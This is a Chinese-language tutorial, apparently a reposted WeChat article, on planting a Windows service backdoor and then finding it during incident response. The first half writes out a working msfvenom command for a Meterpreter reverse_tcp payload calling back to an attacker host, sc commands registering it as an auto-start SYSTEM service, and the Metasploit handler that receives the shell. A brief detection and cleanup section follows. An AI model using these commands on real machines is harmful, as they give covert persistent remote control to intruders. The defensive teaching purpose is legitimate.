一、Windows服务后门介绍
在Windows系统中还有一个重要的机制,就是服务。通常大部分的服务都拥有SYSTEM权限,如果攻击者利用Windows的服务机制创建一个后门服务,那么这个后门将比一般的持久化方法更为强健。
二、Windows服务后门-教程
IP: 192.168.226.128
攻击机: kali
IP: 192.168.226.131
2.1 利用MSF生成一个EXE类型的后门木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.131 lport=8888 -f exe -o wxiaoge.exe
#lhost是我们的主机ip,lport是我们主机的用于监听的端口
2.2 创建后门自启动服务
sc create "ceshi" binpath= "C:UsersAdministratorDesktopwxiaoge.exe"
sc description "ceshi" "ceshi" #设置服务的描述字符串
sc config "ceshi" start= auto #设置这个服务为自动启动
net start "ceshi" #启动服务
2.3 监听返回的shell
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.226.131
set lport 8888
exploit
三、Windows服务后门——应急响应发现
3.1 查看网络连接
3.2 查看服务器上所有的程序和服务
然后查看 服务(意思是:全部的服务都在这)
查看这两处发现,有三个进程是可疑的“粉红色”
接下来查看所有的“粉红色”的程序,并且将程序放在微步云沙箱去检测,经检测发现c:usersadministratordesktopwxiaoge.exe文件为后门木马
注意:
粉色: 表示该条目对应的应用没有数字签名、签名不匹配或者没有发行商信息(可疑程序一般都是粉色)
黄色: 表示该启动条目对应的文件已经不存在了(可疑程序也可能是黄色)
绿色: 表示与之前保存的启动项配置比较,对比出来的差异将以绿色高亮进行显示。
处置:
1、删除ceshi服务和c:usersadministratordesktopwxiaoge.exe文件
原文始发于微信公众号(W小哥):Windows留后门--教程(三)——Windows服务后门
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论